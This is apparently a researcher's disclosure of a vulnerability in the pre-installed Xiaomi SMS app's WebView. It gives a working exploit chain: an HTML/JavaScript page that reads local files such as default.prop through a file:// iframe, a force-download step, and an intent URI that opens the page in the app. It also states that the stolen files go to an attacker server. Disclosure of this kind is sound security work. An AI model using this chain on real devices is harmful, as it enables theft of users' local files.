Yet another android vulnerability which I found on Xiaomi: giant mobile manufacturer company.
Summary: There inbuilt SMS is an application pre-installed on those devices. The application is built with feature which sync in to cloud using webview through application’s sandbox.
This application can also be launched from the browser and have its WebView directed to load an arbitrary URL and allow access to local file system, read local resources and access network resources.
Steps to reproduce:
- Create html file with below snippet:
<button>Read iframe</button>
<button>Try \u0000</button>
<iframe style="width: 100%; height: 200;" src="file:/default.prop" name="test" data-mce-fragment="1"> </iframe>
<script> function exploit() {
var iframe = document.getElementsByTagName('iframe')[0];
try {
alert("Try to read local file.");
alert("contentWindow:" + iframe.contentWindow);
alert("document:" + iframe.contentWindow.document);
alert("body:" + iframe.contentWindow.document.body);
alert("innerHTML:" + iframe.contentWindow.document.body.innerHTML);
} catch (e) {
alert(e);
}
} </script>
Using Content-type to application/force-download it will download above html file in sdcard and once downloaded.
- Using intent proxy with
intent:#Intent;action=android.intent.action.VIEW;component=com.android.mms/.hybrid.SmsHybridActivity;S.url=file%3A%2F%2F%2Fsdcard%2FDownload%2Fexploit.html;end
- exploit.html will opens in webview of sms application and get system files like default.prop and using xhr request this files will send back to attacker server.
proof of concept :
Tip:
Look for file access permission for Pre-installed apps or there respective family apps.